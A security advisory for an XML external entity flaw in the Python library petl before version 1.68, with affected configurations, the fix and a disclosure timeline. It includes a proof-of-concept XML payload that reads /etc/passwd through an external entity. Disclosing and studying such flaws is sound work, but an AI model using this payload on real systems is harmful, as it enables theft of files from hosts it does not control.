petl is a Python library that provides functions for extraction, transformation, and loading (ETL) of data.
petl
before 1.68, in some configurations, allows resolution of entities in XML input.
An attacker who is able to submit XML input to an application using petl
can disclose arbitrary files on the file system in the context of the user under which the application is running.
Applications that:
- accept user-supplied XML input that is processed using
petl
< 1.68 - configure
lxml
as the underlying XML processing library used bypetl
Information Disclosure
- Update to
petl
>= 1.68
The fromxml
function in the petl.io.xml
module converts an XML document to a tabular structure using an XML parsing library. petl
supports using Python's built-in xml
library or lxml
for parsing XML. lxml
is the recommended option.
In petl
< 1.68, the fromxml
function creates an lxml
parser with default settings. By default, lxml
is configured to resolve local entities.
Example application that would be vulnerable using petl
< 1.68 with lxml
:
from petl.io.xml import fromxml
petl_table = fromxml('input.xml', 'tr', 'td')
To disclose the /etc/passwd
file running on the application's host, an attacker could supply a crafted XML file like this:
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT table ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<table>
<tr>
<td>a</td><td>&xxe;</td>
</tr>
</table>
- petl-developers/petl#527
- https://petl.readthedocs.io/en/stable/changes.html
- https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
- Oct. 2, 2020: Notified vendor
- Oct. 5, 2020:
petl
1.68 released with mitigation - Nov. 27, 2020: Public disclosure